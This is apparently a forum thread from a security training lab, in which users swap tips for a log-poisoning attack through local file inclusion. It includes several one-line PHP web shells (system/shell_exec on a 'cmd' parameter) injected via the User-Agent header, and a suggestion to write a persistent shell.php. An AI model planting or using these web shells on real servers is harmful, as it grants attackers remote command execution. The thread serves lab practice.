For the log poisoning this is the web shell that worked for me and I didn’t have to reupload it everytime i input a command.
<?php echo shell_exec($_GET['cmd']); ?>
For the log poisoning this is the web shell that worked for me and I didn’t have to reupload it everytime i input a command.
<?php echo shell_exec($_GET['cmd']); ?>
Well that was a waste of three hours because of a missing backslash.
<?php system(\$_GET['cmd']); ?>
I Finally did it!, It is very simple but i was dumb with qoutes, Spoiler alert.
Let me give u tips, 1st u need another page that has LFI, using the 1st page u got with LFI, then on the Log Poisioning, use "
<?php system($_GET['cmd']); ?>
" not "
<?php system($_GET["cmd"]); ?>
", if you used the 2nd one, the " between the cmd will break the log file and it will crash.
If you are forced to rewrite the shell after each command, you can create a stable shell with echo '<?php ... ?> > the same path as logs>shell.php and then you can acces it …/…/shell.php.
This is the correct answer, no need to encode it just pass as is via curl user agent param.
I’m having the same issue were you able to solve it??
nvm this is stupid I kept doing the same thing and eventually it worked, I don’t know why it didn’t work before. just keep trying I guess…
* User-Agent:<?php system($_GET["cmd"]); ?>
how did you know to include the backslash? this worked for me but the other solutions that worked for others in this thread did not work for me.